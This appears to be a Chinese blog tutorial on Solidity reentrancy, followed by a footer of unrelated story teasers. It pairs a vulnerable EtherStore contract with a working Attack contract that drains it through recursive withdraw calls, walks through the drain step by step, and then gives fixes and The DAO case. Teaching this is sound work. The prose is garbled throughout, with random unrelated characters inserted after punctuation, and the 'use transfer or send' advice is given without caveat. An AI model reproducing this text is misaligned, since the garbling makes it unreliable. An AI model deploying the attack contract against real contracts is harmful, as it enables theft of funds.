合約安全：重入漏洞

一、漏洞

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract EtherStore {
    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() public {
        uint bal = balances[msg.sender];
        require(bal > 0);

        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] = 0;
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

contract Attack {
    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    // Fallback is called when EtherStore sends Ether to this contract.
    fallback() external payable {
        if (address(etherStore).balance >= 1 ether) {
            etherStore.withdraw();
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        etherStore.deposit{value: 1 ether}();
        etherStore.withdraw();
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

這個(gè)被攻擊的EtherStore合約买鸽，可以用來(lái)deposit和withdraw以太幣描沟。withdraw函數(shù)的基本邏輯是：

判斷sender的余額是否大于0，是的話下一步钾虐；
使用call方法給sender發(fā)送合約里屬于sender所有的余額读跷，成功發(fā)送的話下一步；
將合約中屬于sender的余額值清零禾唁。

在攻擊合約Attack合約中效览，先看attack函數(shù)无切，基本邏輯就是先調(diào)用deposit存入1個(gè)以太，再調(diào)用withdraw取出丐枉。然而關(guān)鍵的代碼在fallback函數(shù)中哆键，這個(gè)fallback函數(shù)會(huì)先檢測(cè)被攻擊合約EtherStore的余額，如果大于1個(gè)以太瘦锹，就執(zhí)行withdraw籍嘹。我們?cè)?a href="http://www.reibang.com/p/c9ae44a7f3e0" target="_blank">之前的文章寫(xiě)過(guò)，fallback在什么時(shí)候會(huì)調(diào)用：

fallback和receive

知道這些概念后弯院，就可以演示攻擊過(guò)程了：

1.假設(shè)EtherStore合約中有10個(gè)ETH的余額辱士；
2.攻擊者點(diǎn)擊attack函數(shù)，先執(zhí)行deposit于是攻擊者就存入了1個(gè)ETH听绳，接下來(lái)執(zhí)行withdraw颂碘，withdraw函數(shù)前兩行成功通過(guò)，開(kāi)始使用call函數(shù)發(fā)送屬于sender（這里是Attack合約）的余額椅挣；
3.Attack合約收到余額后头岔，根據(jù)我們上圖所示，先看msg.data是否為空鼠证？是峡竣；receive是否存在？否量九；于是進(jìn)入fallback函數(shù)适掰；
4.fallback函數(shù)中，先檢測(cè)EtherStore的余額荠列，這里應(yīng)當(dāng)是10 - 1 = 9 Ether类浪，通過(guò)，于是又執(zhí)行withdraw弯予；
5.withdraw函數(shù)先檢測(cè)前兩行戚宦，（注意，這是攻擊過(guò)程的關(guān)鍵點(diǎn)锈嫩！）屬于sender的余額為不為0呢受楼？答案是不為0，仍然能通過(guò)呼寸，因?yàn)樯洗螆?zhí)行withdraw函數(shù)艳汽，其實(shí)還停留在call發(fā)送Ether的那一步，下一步還沒(méi)有執(zhí)行对雪，EtherStore中的balance值還沒(méi)有更新河狐，因此這里還是能通過(guò)，繼續(xù)執(zhí)行到下一個(gè)call發(fā)送余額，這樣又把合約余額發(fā)送過(guò)去了馋艺；
6.Attack合約的fallback函數(shù)又開(kāi)始重復(fù)withdraw栅干，一直等到EtherStore合約中的余額為0，Attack合約的fallback函數(shù)不能通過(guò)余額檢測(cè)的時(shí)候捐祠，整個(gè)提取過(guò)程才會(huì)停止碱鳞。
7.執(zhí)行完成，被攻擊合約的所有10個(gè)ETH都被發(fā)送到了被攻擊合約Attack上了踱蛀。

這里的例子窿给，Attack合約其實(shí)用receive函數(shù)也是可以的，而且合約里是可以有單獨(dú)的receive函數(shù)率拒，但是單獨(dú)的fallback函數(shù)就會(huì)報(bào)warning崩泡。

二、預(yù)防方法

1.避免使用call方法轉(zhuǎn)賬

在我們這篇《Solidity的發(fā)賬和收賬詳解》中猬膨，我們說(shuō)了transfer, send和call這三個(gè)轉(zhuǎn)賬函數(shù)的區(qū)別角撞，其中最重要的一點(diǎn)是，transfer和send是有g(shù)as 2300的限制的寥掐，而call沒(méi)有靴寂。這就是為什么我們上面的例子中可以一直被遞歸執(zhí)行的原因磷蜀。如果是使用transfer或者send召耘，2300的gas很快就會(huì)耗完，根本不會(huì)一直循環(huán)被提款褐隆。

2.確保所有狀態(tài)變量的邏輯都發(fā)生在轉(zhuǎn)賬之前

我們這個(gè)例子中污它，能被攻擊的還有一個(gè)原因是balances余額的改變?cè)?code>call轉(zhuǎn)賬之后，所以才能反復(fù)通過(guò)前兩行的狀態(tài)檢測(cè)進(jìn)行重復(fù)提款庶弃。

3.引入互斥鎖

即在代碼執(zhí)行的時(shí)候衫贬，使用互斥鎖來(lái)鎖定合約狀態(tài)，防止重入歇攻。比如我們這個(gè)例子中固惯，可以改成：

    bool reEntrancyMutex = false;
    function withdraw() public {
        require(!reEntrancyMutex);
        uint bal = balances[msg.sender];
        require(bal > 0);

        reEntrancyMutex = true;
        (bool sent, ) = msg.sender.call{value: bal}("");
        reEntrancyMutex = false;
        require(sent, "Failed to send Ether");

        balances[msg.sender] = 0;
    }

抑或是單獨(dú)寫(xiě)個(gè)ReEntrancyGuard的合約，其中只有互斥鎖變量和函數(shù)修飾器：

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract ReEntrancyGuard {
    bool internal locked;

    modifier noReentrant() {
        require(!locked, "No re-entrancy");
        locked = true;
        _;
        locked = false;
    }
}

然后我們的EtherStore合約繼承并在withdraw函數(shù)里加上noReentrant的前綴即可缴守。

open zeppelin官方實(shí)現(xiàn)了這樣的一個(gè)抽象合約ReentrancyGuard葬毫，思路就是上面的那個(gè)思路只不過(guò)它可定制化程度更高，點(diǎn)擊這里可以看到屡穗。
在我們實(shí)際項(xiàng)目中贴捡，還是經(jīng)常使用到open zeppelin的這個(gè)實(shí)現(xiàn)的。

三村砂、真實(shí)案例

The DAO（分散式自治組織）是以太坊早期發(fā)展的主要黑客之一烂斋。當(dāng)時(shí)，該合約持有1.5億美元以上。重入在這次攻擊中發(fā)揮了重要作用汛骂，最終導(dǎo)致了 Ethereum Classic（ETC）的分叉罕模。有關(guān)The DAO 漏洞的詳細(xì)分析，請(qǐng)參閱 Phil Daian 的文章帘瞭。

最后編輯于：2022.11.29 12:42:16

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末手销，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子图张，更是在濱河造成了極大的恐慌锋拖，老刑警劉巖，帶你破解...
沈念sama閱讀 217,509評(píng)論 6贊 504
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件祸轮，死亡現(xiàn)場(chǎng)離奇詭異兽埃，居然都是意外死亡，警方通過(guò)查閱死者的電腦和手機(jī)适袜，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 92,806評(píng)論 3贊 394
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門(mén)柄错，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)，“玉大人苦酱，你說(shuō)我怎么就攤上這事售貌。” “怎么了疫萤？”我有些...
開(kāi)封第一講書(shū)人閱讀 163,875評(píng)論 0贊 354
道士緝兇錄：失蹤的賣(mài)姜人
文/不壞的土叔我叫張陵颂跨，是天一觀的道長(zhǎng)。經(jīng)常有香客問(wèn)我扯饶，道長(zhǎng)恒削，這世上最難降的妖魔是什么？我笑而不...
開(kāi)封第一講書(shū)人閱讀 58,441評(píng)論 1贊 293
?港島之戀（遺憾婚禮）
正文為了忘掉前任尾序，我火速辦了婚禮钓丰，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘每币。我一直安慰自己携丁，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 67,488評(píng)論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布兰怠。她就那樣靜靜地躺著梦鉴，像睡著了一般。火紅的嫁衣襯著肌膚如雪痕慢。梳的紋絲不亂的頭發(fā)上尚揣，一...
開(kāi)封第一講書(shū)人閱讀 51,365評(píng)論 1贊 302
城市分裂傳說(shuō)
那天，我揣著相機(jī)與錄音掖举，去河邊找鬼快骗。笑死，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的方篮。我是一名探鬼主播名秀，決...
沈念sama閱讀 40,190評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼藕溅！你這毒婦竟也來(lái)了匕得？” 一聲冷哼從身側(cè)響起，我...
開(kāi)封第一講書(shū)人閱讀 39,062評(píng)論 0贊 276
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤巾表，失蹤者是張志新（化名）和其女友劉穎汁掠，沒(méi)想到半個(gè)月后，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體集币，經(jīng)...
沈念sama閱讀 45,500評(píng)論 1贊 314
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡考阱，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,706評(píng)論 3贊 335
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了鞠苟。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片乞榨。...
茶點(diǎn)故事閱讀 39,834評(píng)論 1贊 347
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖当娱，靈堂內(nèi)的尸體忽然破棺而出吃既，到底是詐尸還是另有隱情，我是刑警寧澤跨细，帶...
沈念sama閱讀 35,559評(píng)論 5贊 345
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布鹦倚，位于F島的核電站，受9級(jí)特大地震影響扼鞋，放射性物質(zhì)發(fā)生泄漏申鱼。R本人自食惡果不足惜愤诱，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,167評(píng)論 3贊 328
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一云头、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧淫半，春花似錦溃槐、人聲如沸。這莊子的主人今日做“春日...
開(kāi)封第一講書(shū)人閱讀 31,779評(píng)論 0贊 22
一樁弒父案昏滴，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)。三九已至对人，卻和暖如春谣殊，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背牺弄。一陣腳步聲響...
開(kāi)封第一講書(shū)人閱讀 32,912評(píng)論 1贊 269
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工姻几，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人。一個(gè)月前我還...
沈念sama閱讀 47,958評(píng)論 2贊 370
代替公主和親
正文我出身青樓蛇捌，卻偏偏與公主長(zhǎng)得像抚恒，于是被迫代替她去往敵國(guó)和親。傳聞我的和親對(duì)象是個(gè)殘疾皇子络拌，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,779評(píng)論 2贊 354